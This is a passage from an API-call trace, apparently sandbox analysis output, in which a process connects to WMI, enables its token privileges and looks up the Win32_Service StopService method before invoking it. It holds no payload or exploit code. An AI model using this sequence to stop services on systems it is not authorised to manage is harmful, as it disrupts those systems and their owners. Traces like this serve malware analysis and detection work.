dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0314.300] lstrlenW (lpString="CREATE") returned 6 [0314.300] lstrlenW (lpString="call") returned 4 [0314.300] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0314.300] lstrlenW (lpString="CALL") returned 4 [0314.300] lstrlenW (lpString="call") returned 4 [0314.300] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0314.300] lstrlenW (lpString="/") returned 1 [0314.300] lstrlenW (lpString="stopservice") returned 11 [0314.300] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="/", cchCount2=1) returned 3 [0314.300] lstrlenW (lpString="-") returned 1 [0314.301] lstrlenW (lpString="stopservice") returned 11 [0314.301] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="-", cchCount2=1) returned 3 [0314.301] lstrlenW (lpString="stopservice") returned 11 [0314.301] malloc (_Size=0x18) returned 0x2c82a30 [0314.301] lstrlenW (lpString="stopservice") returned 11 [0314.301] ??0CHString@@QAE@XZ () returned 0x2b0d6fc [0314.301] GetCurrentThreadId () returned 0xe10 [0314.301] GetCurrentThreadId () returned 0xe10 [0314.301] ??0CHString@@QAE@XZ () returned 0x2b0d684 [0314.301] malloc (_Size=0x4) returned 0x2c8b180 [0314.301] malloc (_Size=0xc) returned 0x2c8ab70 [0314.301] malloc (_Size=0xc) returned 0x2c8aed0 [0314.301] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2ea4748, strNetworkResource="root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68518 | out: ppNamespace=0xa68518*=0x2ebac30) returned 0x0 [0314.340] free (_Block=0x2c8aed0) [0314.340] CoSetProxyBlanket (pProxy=0x2ebac30, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0314.340] free (_Block=0x2c8b180) [0314.340] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0314.340] free (_Block=0x2c8ab70) [0314.340] malloc (_Size=0xc) returned 0x2c8ab70 [0314.340] IWbemServices:GetObject (in: This=0x2ebac30, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x2b0d714*=0x0, ppCallResult=0x0 | out: ppObject=0x2b0d714*=0x2f122c0, ppCallResult=0x0) returned 0x0 [0314.395] free (_Block=0x2c8ab70) [0314.395] IWbemClassObject:BeginMethodEnumeration (This=0x2f122c0, lEnumFlags=0) returned 0x0 [0314.395] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="StartService", ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x2f124b8) returned 0x0 [0314.395] lstrlenW (lpString="StartService") returned 12 [0314.395] lstrlenW (lpString="stopservice") returned 11 [0314.395] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StartService", cchCount2=12) returned 3 [0314.395] IUnknown:Release (This=0x2f124b8) returned 0x0 [0314.395] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="StopService", ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x2f124b8) returned 0x0 [0314.395] lstrlenW (lpString="StopService") returned 11 [0314.395] lstrlenW (lpString="stopservice") returned 11 [0314.395] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="StopService", cchCount2=11) returned 2 [0314.395] malloc (_Size=0x38) returned 0x2c8c8e8 [0314.395] ??0CHString@@QAE@XZ () returned 0x2b0d264 [0314.395] GetCurrentThreadId () returned 0xe10 [0314.395] IWbemClassObject:GetNames (in: This=0x2f124b8, wszQualifierName=0x0, lFlags=64, pQualifierVal=0x0, pNames=0x2b0d274 | out: pNames=0x2b0d274*="\x01ƀ\x04") returned 0x0 [0314.396] SafeArrayGetLBound (in: psa=0x2f12750, nDim=0x1, plLbound=0x2b0d260 | out: plLbound=0x2b0d260) returned 0x0 [0314.396] SafeArrayGetUBound (in: psa=0x2f12750, nDim=0x1, plUbound=0x2b0d25c | out: plUbound=0x2b0d25c) returned 0x0 [0314.396] SafeArrayGetElement (in: psa=0x2f12750, rgIndices=0x2b0d268, pv=0x2b0d278 | out: pv=0x2b0d278) returned 0x0 [0314.396] malloc (_Size=0x24) returned 0x2c8c928 [0314.396] IWbemClassObject:GetPropertyQualifierSet (in: This=0x2f124b8, wszProperty="ReturnValue", ppQualSet=0x2b0d188 | out: ppQualSet=0x2b0d188*=0x2ee77e0) returned 0x0 [0314.396] malloc (_Size=0xc) returned 0x2c8ab70 [0314.397] IWbemQualifierSet:Get (in: This=0x2ee77e0, wszName="CIMTYPE", lFlags=0, pVal=0x2b0d158*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2b0d158*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="uint32", varVal2=0x0), plFlavor=0x0) returned 0x0 [0314.397] free (_Block=0x2c8ab70) [0314.397] malloc (_Size=0xc) returned 0x2c8ab70 [0314.397] IWbemClassObject:Get (in: This=0x2f124b8, wszName="ReturnValue", lFlags=0, pVal=0x2b0d130*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2b0d16c*=45142356, plFlavor=0x0 | out: pVal=0x2b0d130*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x2b0d16c*=19, plFlavor=0x0) returned 0x0 [0314.397] malloc (_Size=0xc) returned 0x2c8aeb8 [0314.397] IWbemQualifierSet:Get (in: This=0x2ee77e0, wszName="read", lFlags=0, pVal=0x2b0d170*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2b0d170*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0314.397] free (_Block=0x2c8aeb8) [0314.397] malloc (_Size=0xc) returned 0x2c8ae58 [0314.397] IWbemQualifierSet:Get (in: This=0x2ee77e0, wszName="write", lFlags=0, pVal=0x2b0d170*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2b0d170*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0314.397] free (_Block=0x2c8ae58) [0314.397] malloc (_Size=0xc) returned 0x2c8ae58 [0314.397] malloc (_Size=0xc) returned 0x2c8aeb8 [0314.397] IWbemQualifierSet:Get (in: This=0x2ee77e0, wszName="Description", lFlags=0, pVal=0x2b0d148*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2b0d148*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0314.398] free (_Block=0x2c8aeb8) [0314.398] malloc (_Size=0xc) returned 0x2c8aed0 [0314.398] lstrlenA (lpString="Not Available") returned 13 [0314.398] malloc (_Size=0x1c) returned 0x2c8c958 [0314.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa21d94, cbMultiByte=-1, lpWideCharStr=0x2c8c958, cchWideChar=14 | out: lpWideCharStr="Not Available") returned 14 [0314.398] free (_Block=0x2c8c958) [0314.398] IUnknown:Release (This=0x2ee77e0) returned 0x0 [0314.398] malloc (_Size=0x24) returned 0x2c8c958 [0314.398] malloc (_Size=0xc) returned 0x2c8ae10 [0314.398] malloc (_Size=0x24) returned 0x2c8c988 [0314.398] malloc (_Size=0x38) returned 0x2c8c9b8 [0314.398] malloc (_Size=0x24) returned 0x2c8c9f8 [0314.398] free (_Block=0x2c8c988) [0314.398] free (_Block=0x2c8c958) [0314.398] free (_Block=0x2c8c928) [0314.398] free (_Block=0x2c8ae58) [0314.398] free (_Block=0x2c8aed0) [0314.398] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0314.398] IWbemClassObject:GetMethodQualifierSet (in: This=0x2f122c0, wszMethod="StopService", ppQualSet=0x2b0d67c | out: ppQualSet=0x2b0d67c*=0x2ee93a0) returned 0x0 [0314.398] malloc (_Size=0xc) returned 0x2c8ae28 [0314.399] IWbemQualifierSet:Get (in: This=0x2ee93a0, wszName="Implemented", lFlags=0, pVal=0x2b0d664*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2b0d664*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0) returned 0x80041002 [0314.399] free (_Block=0x2c8ae28) [0314.399] malloc (_Size=0xc) returned 0x2c8ae88 [0314.399] malloc (_Size=0xc) returned 0x2c8ae40 [0314.399] IWbemQualifierSet:Get (in: This=0x2ee93a0, wszName="Description", lFlags=0, pVal=0x2b0d654*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), plFlavor=0x0 | out: pVal=0x2b0d654*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The StopService method places the service in the stopped state. It returns an integer value of 0 if the service was successfully stopped, 1 if the request is not supported, and any other number to indicate an error. It returns one of the following integer values:\n0 - The request was accepted.\n1 - The request is not supported.\n2 - The user did not have the necessary access.\n3 - The service cannot be stopped because other services that are running are dependent on it.\n4 - The requested control code is not valid, or it is unacceptable to the service.\n5 - The requested control code cannot be sent to the service because the state of the service (Win32_BaseService:State) is equal to 0, 1, or 2.\n6 - The service has not been started.\n7 - The service did not respond to the start request in a timely fashion.\n8 - Unknown failure when starting the service.\n9 - The directory path to the service executable was not found.\n10 - The service is already running.\n11 - The database to add a new service is locked.\n12 - A dependency for which this service relies on has been removed from the system.\n13 - The service failed to find the service needed from a dependent service.\n14 - The service has been disabled from the system.\n15 - The service does not have the correct authentication to run on the system.\n16 - This service is being removed from the system.\n17 - There is no execution thread for the service.\n18 - There are circular dependencies when starting the service.\n19 - There is a service running under the same name.\n20 - There are invalid characters in the name of the service.\n21 - Invalid parameters have been passed to the service.\n22 - The account, which this service is to run under is either invalid or lacks the permissions to run the service.\n23 - The service exists in the database of services available from the system.\n24 - The service is currently paused in the system.\nOther - For integer values other than those listed above, refer to Win32 error code documentation.", varVal2=0x0), plFlavor=0x0) returned 0x0 [0314.399] free (_Block=0x2c8ae40) [0314.399] malloc (_Size=0xc) returned 0x2c8ae28 [0314.400] IUnknown:Release (This=0x2ee93a0) returned 0x0 [0314.400] malloc (_Size=0x38) returned 0x2c8c928 [0314.400] malloc (_Size=0x38) returned 0x2c8c968 [0314.400] malloc (_Size=0x24) returned 0x2c8ca28 [0314.400] malloc (_Size=0xc) returned 0x2c8ae40 [0314.400] malloc (_Size=0x38) returned 0x2c8ca58 [0314.400] malloc (_Size=0x38) returned 0x2c8ca98 [0314.400] malloc (_Size=0x24) returned 0x2c8cad8 [0314.400] malloc (_Size=0x28) returned 0x2c8cb08 [0314.400] malloc (_Size=0x38) returned 0x2c8cb38 [0314.400] malloc (_Size=0x38) returned 0x2c8cb78 [0314.400] malloc (_Size=0x24) returned 0x2c8cbb8 [0314.400] free (_Block=0x2c8cad8) [0314.400] free (_Block=0x2c8ca98) [0314.400] free (_Block=0x2c8ca58) [0314.400] free (_Block=0x2c8ca28) [0314.400] free (_Block=0x2c8c968) [0314.400] free (_Block=0x2c8c928) [0314.400] IUnknown:Release (This=0x2f124b8) returned 0x0 [0314.400] free (_Block=0x2c8c9f8) [0314.400] free (_Block=0x2c8c9b8) [0314.400] free (_Block=0x2c8c8e8) [0314.400] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="PauseService", ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x2f14de8) returned 0x0 [0314.400] lstrlenW (lpString="PauseService") returned 12 [0314.400] lstrlenW (lpString="stopservice") returned 11 [0314.401] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="PauseService", cchCount2=12) returned 3 [0314.401] IUnknown:Release (This=0x2f14de8) returned 0x0 [0314.401] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="ResumeService", ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x2f14de8) returned 0x0 [0314.401] lstrlenW (lpString="ResumeService") returned 13 [0314.401] lstrlenW (lpString="stopservice") returned 11 [0314.401] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ResumeService", cchCount2=13) returned 3 [0314.401] IUnknown:Release (This=0x2f14de8) returned 0x0 [0314.401] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="InterrogateService", ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x2f14de8) returned 0x0 [0314.401] lstrlenW (lpString="InterrogateService") returned 18 [0314.401] lstrlenW (lpString="stopservice") returned 11 [0314.401] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="InterrogateService", cchCount2=18) returned 3 [0314.401] IUnknown:Release (This=0x2f14de8) returned 0x0 [0314.401] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="UserControlService", ppInSignature=0x2b0d71c*=0x2f124b8, ppOutSignature=0x2b0d718*=0x2f14f70) returned 0x0 [0314.402] lstrlenW (lpString="UserControlService") returned 18 [0314.402] lstrlenW (lpString="stopservice") returned 11 [0314.402] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="UserControlService", cchCount2=18) returned 1 [0314.402] IUnknown:Release (This=0x2f124b8) returned 0x0 [0314.402] IUnknown:Release (This=0x2f14f70) returned 0x0 [0314.402] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="Create", ppInSignature=0x2b0d71c*=0x2f124b8, ppOutSignature=0x2b0d718*=0x2f16f40) returned 0x0 [0314.403] lstrlenW (lpString="Create") returned 6 [0314.403] lstrlenW (lpString="stopservice") returned 11 [0314.403] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Create", cchCount2=6) returned 3 [0314.403] IUnknown:Release (This=0x2f124b8) returned 0x0 [0314.403] IUnknown:Release (This=0x2f16f40) returned 0x0 [0314.403] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="Change", ppInSignature=0x2b0d71c*=0x2f124b8, ppOutSignature=0x2b0d718*=0x2f16cc0) returned 0x0 [0314.403] lstrlenW (lpString="Change") returned 6 [0314.403] lstrlenW (lpString="stopservice") returned 11 [0314.403] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Change", cchCount2=6) returned 3 [0314.403] IUnknown:Release (This=0x2f124b8) returned 0x0 [0314.403] IUnknown:Release (This=0x2f16cc0) returned 0x0 [0314.403] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="ChangeStartMode", ppInSignature=0x2b0d71c*=0x2f124b8, ppOutSignature=0x2b0d718*=0x2f150e0) returned 0x0 [0314.403] lstrlenW (lpString="ChangeStartMode") returned 15 [0314.403] lstrlenW (lpString="stopservice") returned 11 [0314.403] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="ChangeStartMode", cchCount2=15) returned 3 [0314.404] IUnknown:Release (This=0x2f124b8) returned 0x0 [0314.404] IUnknown:Release (This=0x2f150e0) returned 0x0 [0314.404] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="Delete", ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x2ee5fc8) returned 0x0 [0314.404] lstrlenW (lpString="Delete") returned 6 [0314.404] lstrlenW (lpString="stopservice") returned 11 [0314.404] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="Delete", cchCount2=6) returned 3 [0314.404] IUnknown:Release (This=0x2ee5fc8) returned 0x0 [0314.404] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="GetSecurityDescriptor", ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x2f124b8) returned 0x0 [0314.404] lstrlenW (lpString="GetSecurityDescriptor") returned 21 [0314.404] lstrlenW (lpString="stopservice") returned 11 [0314.404] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="GetSecurityDescriptor", cchCount2=21) returned 3 [0314.404] IUnknown:Release (This=0x2f124b8) returned 0x0 [0314.404] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*="SetSecurityDescriptor", ppInSignature=0x2b0d71c*=0x2f124b8, ppOutSignature=0x2b0d718*=0x2f14f70) returned 0x0 [0314.404] lstrlenW (lpString="SetSecurityDescriptor") returned 21 [0314.404] lstrlenW (lpString="stopservice") returned 11 [0314.404] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="stopservice", cchCount1=11, lpString2="SetSecurityDescriptor", cchCount2=21) returned 3 [0314.404] IUnknown:Release (This=0x2f124b8) returned 0x0 [0314.404] IUnknown:Release (This=0x2f14f70) returned 0x0 [0314.404] IWbemClassObject:NextMethod (in: This=0x2f122c0, lFlags=0, pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0 | out: pstrName=0x2b0d720*=0x0, ppInSignature=0x2b0d71c*=0x0, ppOutSignature=0x2b0d718*=0x0) returned 0x40005 [0314.404] IUnknown:Release (This=0x2f122c0) returned 0x0 [0314.404] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0314.404] lstrlenW (lpString="SET") returned 3 [0314.405] lstrlenW (lpString="call") returned 4 [0314.405] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0314.405] lstrlenW (lpString="CREATE") returned 6 [0314.405] lstrlenW (lpString="call") returned 4 [0314.405] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CREATE", cchCount2=6) returned 1 [0314.405] free (_Block=0x2c829f0) [0314.405] malloc (_Size=0x4) returned 0x2c8b180 [0314.405] lstrlenW (lpString="GET") returned 3 [0314.405] lstrlenW (lpString="call") returned 4 [0314.405] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0314.405] lstrlenW (lpString="LIST") returned 4 [0314.405] lstrlenW (lpString="call") returned 4 [0314.405] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0314.405] lstrlenW (lpString="ASSOC") returned 5 [0314.405] lstrlenW (lpString="call") returned 4 [0314.405] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="ASSOC", cchCount2=5) returned 3 [0314.405] WbemLocator:IUnknown:AddRef (This=0x2ea4748) returned 0x3 [0314.405] free (_Block=0x2c82788) [0314.405] lstrlenW (lpString="") returned 0 [0314.405] lstrlenW (lpString="NQDPDE") returned 6 [0314.405] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0314.405] lstrlenW (lpString="NQDPDE") returned 6 [0314.405] malloc (_Size=0xe) returned 0x2c8ae58 [0314.405] lstrlenW (lpString="NQDPDE") returned 6 [0314.405] GetCurrentThreadId () returned 0xe10 [0314.405] GetCurrentProcess () returned 0xffffffff [0314.405] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2b0f7f8 | out: TokenHandle=0x2b0f7f8*=0x2f8) returned 1 [0314.405] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2b0f7f4 | out: TokenInformation=0x0, ReturnLength=0x2b0f7f4) returned 0 [0314.405] malloc (_Size=0x118) returned 0x2c8c8e8 [0314.405] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x2c8c8e8, TokenInformationLength=0x118, ReturnLength=0x2b0f7f4 | out: TokenInformation=0x2c8c8e8, ReturnLength=0x2b0f7f4) returned 1 [0314.406] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x2c8c8e8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0314.406] free (_Block=0x2c8c8e8) [0314.406] CloseHandle (hObject=0x2f8) returned 1 [0314.406] lstrlenW (lpString="GET") returned 3 [0314.406] lstrlenW (lpString="call") returned 4 [0314.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0314.406] lstrlenW (lpString="LIST") returned 4 [0314.406] lstrlenW (lpString="call") returned 4 [0314.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0314.406] lstrlenW (lpString="SET") returned 3 [0314.406] lstrlenW (lpString="call") returned 4 [0314.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0314.406] lstrlenW (lpString="CALL") returned 4 [0314.406] lstrlenW (lpString="call") returned 4 [0314.406] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0314.406] ??0CHString@@QAE@XZ () returned 0x2b0f7b8 [0314.406] GetCurrentThreadId () returned 0xe10 [0314.406] malloc (_Size=0xc) returned 0x2c8ae70 [0314.406] malloc (_Size=0xc) returned 0x2c8aea0 [0314.406] malloc (_Size=0xc) returned 0x2c8aeb8 [0314.406] malloc (_Size=0xc) returned 0x2c8aed0 [0314.406] malloc (_Size=0xc) returned 0x2c89958 [0314.406] SysStringLen (param_1="\\\\") returned 0x2 [0314.406] SysStringLen (param_1="NQDPDE") returned 0x6 [0314.407] malloc (_Size=0xc) returned 0x2c8cc48 [0314.407] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0314.407] SysStringLen (param_1="\\") returned 0x1 [0314.407] malloc (_Size=0xc) returned 0x2c8cee8 [0314.407] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0314.407] SysStringLen (param_1="root\\cimv2") returned 0xa [0314.407] free (_Block=0x2c8cc48) [0314.407] free (_Block=0x2c89958) [0314.407] free (_Block=0x2c8aed0) [0314.407] free (_Block=0x2c8aeb8) [0314.407] free (_Block=0x2c8aea0) [0314.407] free (_Block=0x2c8ae70) [0314.407] malloc (_Size=0xc) returned 0x2c8ccc0 [0314.407] malloc (_Size=0xc) returned 0x2c8ce88 [0314.407] malloc (_Size=0xc) returned 0x2c8cca8 [0314.407] WbemLocator:IWbemLocator:ConnectServer (in: This=0x2ea4748, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x2ee7690) returned 0x0 [0314.416] free (_Block=0x2c8cca8) [0314.416] free (_Block=0x2c8ce88) [0314.416] free (_Block=0x2c8ccc0) [0314.416] CoSetProxyBlanket (pProxy=0x2ee7690, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0314.416] free (_Block=0x2c8cee8) [0314.416] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0314.416] ??0CHString@@QAE@XZ () returned 0x2b0f7b0 [0314.416] GetCurrentThreadId () returned 0xe10 [0314.416] malloc (_Size=0x38) returned 0x2c8c8e8 [0314.416] malloc (_Size=0x28) returned 0x2c8c928 [0314.416] malloc (_Size=0x28) returned 0x2c8c958 [0314.416] malloc (_Size=0x38) returned 0x2c8c988 [0314.416] malloc (_Size=0x38) returned 0x2c8c9c8 [0314.416] malloc (_Size=0x24) returned 0x2c8ca08 [0314.416] malloc (_Size=0xc) returned 0x2c8ae70 [0314.417] lstrlenA (lpString="") returned 0 [0314.417] malloc (_Size=0x2) returned 0x2c82788 [0314.417] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x2c82788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0314.417] free (_Block=0x2c82788) [0314.417] malloc (_Size=0x38) returned 0x2c8ca38 [0314.417] malloc (_Size=0x24) returned 0x2c8ca78 [0314.417] malloc (_Size=0xc) returned 0x2c8aea0 [0314.417] free (_Block=0x2c8ae70) [0314.417] IWbemServices:GetObject (in: This=0x2ee7690, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x2b0f788*=0x0, ppCallResult=0x0 | out: ppObject=0x2b0f788*=0x2f122c0, ppCallResult=0x0) returned 0x0 [0314.467] malloc (_Size=0xc) returned 0x2c8ae70 [0314.467] IWbemClassObject:GetMethod (in: This=0x2f122c0, wszName="stopservice", lFlags=0, ppInSignature=0x2b0f7a4, ppOutSignature=0x2b0f784 